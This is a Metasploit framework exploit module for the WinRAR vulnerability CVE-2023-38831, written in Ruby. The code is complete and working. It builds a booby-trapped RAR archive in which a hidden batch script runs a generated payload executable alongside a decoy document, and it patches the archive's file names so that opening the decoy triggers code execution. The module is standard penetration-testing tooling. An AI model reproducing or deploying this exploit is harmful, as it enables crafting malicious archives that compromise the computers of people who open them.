WinRAR CVE-2023-38831 Exploit

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'zip'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WinRAR CVE-2023-38831 Exploit',
        'Description' => %q{
          This module exploits a vulnerability in WinRAR (CVE-2023-38831). When a user opens a crafted RAR file and its
          embedded document, the decoy document is executed, leading to code execution.
        },
        'License' => MSF_LICENSE,
        'Author' => ['Alexander "xaitax" Hagenah'],
        'References' => [
          ['CVE', '2023-38831'],
          ['URL', 'https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/'],
          ['URL', 'https://b1tg.github.io/post/cve-2023-38831-winrar-analysis/']
        ],
        'Platform' => ['win'],
        'Arch' => [ ARCH_X64, ARCH_X86 ],
        'Targets' => [['Windows', {}]],
        'Payload' => {
          'DisableNops' => true
        },
        'DisclosureDate' => '2023-08-23',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      OptString.new('OUTPUT_FILE', [true, 'The output filename.', 'poc.rar']),
      OptPath.new('INPUT_FILE', [true, 'Path to the decoy file (PDF, JPG, PNG, etc.).'])
    ])

    register_advanced_options([
      OptString.new('PAYLOAD_NAME', [true, 'The filename for the payload executable.', Rex::Text.rand_text_alpha(8) + '.exe'])
    ])
  end

  def exploit
    Dir.mktmpdir do |temp_dir|
      output_rar = File.join(Msf::Config.local_directory, datastore['OUTPUT_FILE'])
      input_file = datastore['INPUT_FILE']
      decoy_name = File.basename(input_file)
      decoy_ext = ".#{File.extname(input_file)[1..]}"
      payload_name = datastore['PAYLOAD_NAME']
      decoy_dir = File.join(temp_dir, "#{decoy_name}A")
      Dir.mkdir(decoy_dir)

      payload_path = File.join(decoy_dir, payload_name)
      File.open(payload_path, 'wb') { |file| file.write(generate_payload_exe) }

      bat_script = <<~BAT
        @echo off
        start "" "%~dp0#{payload_name}"
        start "" "%~dp0#{decoy_name}"
      BAT

      bat_path = File.join(decoy_dir, "#{decoy_name}A.cmd")
      File.write(bat_path, bat_script)

      FileUtils.cp(input_file, File.join(temp_dir, "#{decoy_name}B"))

      zip_path = File.join(temp_dir, 'template.zip')
      Zip::File.open(zip_path, Zip::File::CREATE) do |zipfile|
        zipfile.add("#{decoy_name}B", File.join(temp_dir, "#{decoy_name}B"))
        zipfile.add("#{decoy_name}A/#{decoy_name}A.cmd", bat_path)
        zipfile.add("#{decoy_name}A/#{payload_name}", payload_path)
      end

      content = File.binread(zip_path)
      content.gsub!(decoy_ext + 'A', decoy_ext + ' ')
      content.gsub!(decoy_ext + 'B', decoy_ext + ' ')

      File.binwrite(output_rar, content)

      print_good("Created #{output_rar}")
    end
  end

end